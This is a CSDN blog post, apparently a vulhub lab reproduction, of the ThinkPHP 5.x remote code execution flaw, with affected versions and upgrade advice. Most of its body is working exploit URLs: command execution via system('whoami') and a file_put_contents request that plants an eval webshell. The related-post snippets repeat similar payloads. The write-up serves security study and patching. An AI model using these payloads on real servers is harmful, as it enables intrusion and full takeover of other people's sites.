Thinkphp5-5.0.22/5.1.29远程执行代码漏洞

最新推荐文章于 2024-04-27 09:50:52 发布
最新推荐文章于 2024-04-27 09:50:52 发布
阅读量276 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hovcfuti/article/details/133817003
版权

漏洞简介

ThinkPHP版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

影响版本

ThinkPHP 5.0.x < 5.0.23ThinkPHP 5.1.x < 5.1.31

漏洞复现

vulhub拉取靶场

访问

/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1%20and%20it%27ll%20execute%20the%20phpinfo

任意代码执行

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入webshell

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zcc.php&vars[1][]=%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%7a%63%63%27%5d%29%3b%3f%3e

蚁剑连接

修复建议

升级新版本

升级方法请参考:https://blog.thinkphp.cn/869075

白鲨6
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 583
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-19 2714
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP5 5.0.22/5.1.29 RCE】
xhwfa的博客
05-02 3096
一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,因为没有正确处理控制器名,致使在网站没有开启强制路由的状况下(即默认状况下)能够执行任意方法,从而致使远程命令执行漏洞。 二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080,出现如
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1899
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
thinkphp5 5.0.22/5.1.29远程代码执行漏洞
最新发布
weixin_45653478的博客
04-27 725
ThinkPHP是中国使用极为广泛的PHP开发框架。在其版本 5 中,由于框架错误地处理了控制器名称,如果网站未启用强制路由(默认),它可以执行任何方法,从而导致 RCE 漏洞
Thinkphp-5-0远程代码执行漏洞1
08-03
Thinkphp-5-0远程代码执行漏洞1
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
thinkPHP5.0.22
12-06
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
ThinkPHP 开源PHP开发框架 v5.0.22 完整版
10-07
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
Thinkphp5 5.0.22/5.1.29远程代码执行漏洞复现
weixin_52685785的博客
03-15 252
用HackBar 插件向其发送请求,查看是否存在远程执行漏洞。进入vulhub中漏洞环境的目录,启动环境。将一句话木马进行base64加密并进行上传。出现报错,进入需要修改的文档。访问shell.php。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 7421
ThinkPHP5系列远程代码执行漏洞复现(详细)
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞
不曾扬帆,何以至远方
07-17 1885
Thinkphp 5 远程代码执行漏洞
漏洞复现----23、ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
七天
07-14 1267
文章目录一、漏洞简介二、漏洞代码三、漏洞复现五、修复代码 一、漏洞简介 ThinkPHP是PHP语言的一种开源框架。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP5.0以上版本支持,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,ThinkPHP框架本身没有什么特别模块要求,具体的应用系统运行环境要求视开发所涉及的模块。 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由的情况下可以执行任意方法,从而导致远程命令执行漏洞。受影响的版
thinkphp5.0.22漏洞利用
qq_52223347的博客
03-10 3531
一、搭建环境 phpstudy的版本大于5.0 解压源码到www下 浏览器访问 127.0.0.1/thinkphp/public/index.php 漏洞利用 ?s=.|think\config/get&name=database.username 查看数据库的用户 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami whoa
ThinkPHP v5.0.22 远程代码漏洞复现分析
ArrowQin的博客
05-04 2791
漏洞描述 漏洞类型:远程代码执行漏洞 POC:?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir ?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=1 环...
Thinkphp5.0.22/5.1.29远程代码执行漏洞
夜星空如海的博客
09-30 1464
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
<?php // +---------------------------------------------------------------------- // | ThinkPHP [ WE CAN DO IT JUST THINK ] // +---------------------------------------------------------------------- // | Copyright (c) 2006~2016 http://thinkphp.cn All rights reserved. // +---------------------------------------------------------------------- // | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 ) // +---------------------------------------------------------------------- // | Author: liu21st <[email protected]> // +---------------------------------------------------------------------- // 应用行为扩展定义文件 return [ // 应用初始化 'app_init' => [], // 应用开始 'app_begin' => [], // 应用调度 'app_dispatch' => [ 'app\\common\\behavior\\Common', ], // 模块初始化 'module_init' => [ 'app\\common\\behavior\\Common', ], // 插件开始 'addon_begin' => [ 'app\\common\\behavior\\Common', ], // 操作开始执行 'action_begin' => [], // 视图内容过滤 'view_filter' => [], // 日志写入 'log_write' => [], // 应用结束 'app_end' => [], ];
01-10
这是 PHP 代码,它定义了一个数组,数组的每一项都是应用行为扩展。 具体地,数组的键是应用行为扩展的名称,而数组的值是一个数组,表示这个应用行为扩展所对应的类名。 例如,当应用初始化时,会触发 app_init ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值